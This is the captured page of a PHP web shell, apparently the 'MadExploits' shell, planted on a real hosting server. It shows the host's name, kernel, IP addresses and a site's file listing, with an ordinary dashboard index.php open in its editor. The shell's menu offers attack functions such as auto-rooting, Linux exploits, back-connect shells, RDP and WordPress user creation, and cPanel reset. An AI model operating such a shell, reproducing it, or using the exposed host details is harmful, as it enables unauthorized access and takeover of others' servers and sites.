Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.223
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
contract.tradesense.co.ke /
[ HOME SHELL ]
Name
Size
Permission
Action
Majestic_Document_Generator
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
style
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
.gitignore
8
B
-rw-r--r--
LICENSE
1.07
KB
-rw-r--r--
Majestic_Document_Generator.zi...
4.8
MB
-rw-r--r--
archivex8LBD.tar.gz
14.31
MB
-rw-r--r--
auth.php
3.04
KB
-rw-r--r--
contract
4.8
MB
-rw-r--r--
documents.php
6.21
KB
-rw-r--r--
error_log
1.1
MB
-rw-r--r--
help.php
1.92
KB
-rw-r--r--
index.php
3.02
KB
-rw-r--r--
recent.php
3.88
KB
-rw-r--r--
settings.php
3.46
KB
-rw-r--r--
userdetails.php
786
B
-rw-r--r--
users.php
3.75
KB
-rw-r--r--
view.php
318
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include "inc/App.php"; $user->Protect(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0"/> <title>Makmende Dashboard</title> <!-- CSS --> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> <link href="style/css/materialize.css" type="text/css" rel="stylesheet" media="screen,projection"/> <link href="style/css/style.css" type="text/css" rel="stylesheet" media="screen,projection"/> <link rel="icon" type="image/png" href="https://makmende.com/profile.jpg"/> </head> <body> <?php include "inc/commons/header.php"; ?> <main> <div class="card-panel blue-grey darken-4"> <span class="white-text text-darken-2"><h5>Makmende Dashboard</h5></span> </div> <div class="container homepage"> <div class="row"> <?php if ($user->has_access('documents')) { ?> <div class="col s12 m4"> <div class="card" onclick="top.location='documents.php?menu=add_document'"> <div class="card-image"> <span class="card-title">Create document</span> </div> </div> </div> <div class="col s12 m4"> <div class="card" onclick="top.location='documents.php'"> <div class="card-image" style='background:#DB4B59'> <span class="card-title">Documents</span> </div> </div> </div> <?php } ?> <?php if ($user->has_access('templates')) { ?> <div class="col s12 m4"> <div class="card" onclick="top.location='documents.php?menu=templates'"> <div class="card-image" style="background:#f6bb42;"> <span class="card-title">Templates</span> </div> </div> </div> <?php } ?> <div class="col s12 m4"> <div class="card" onclick="top.location='recent.php'"> <div class="card-image" style="background:#8C1A65;"> <span class="card-title">Recent activity</span> </div> </div> </div> <?php if ($user->has_access('users')) { ?> <div class="col s12 m4"> <div class="card" onclick="top.location='users.php'"> <div class="card-image" style="background:#86C43D;"> <span class="card-title">Users</span> </div> </div> </div> <?php } ?> </div> </div> </main> <?php include "inc/commons/footer.php"; ?> </body> </html>
Close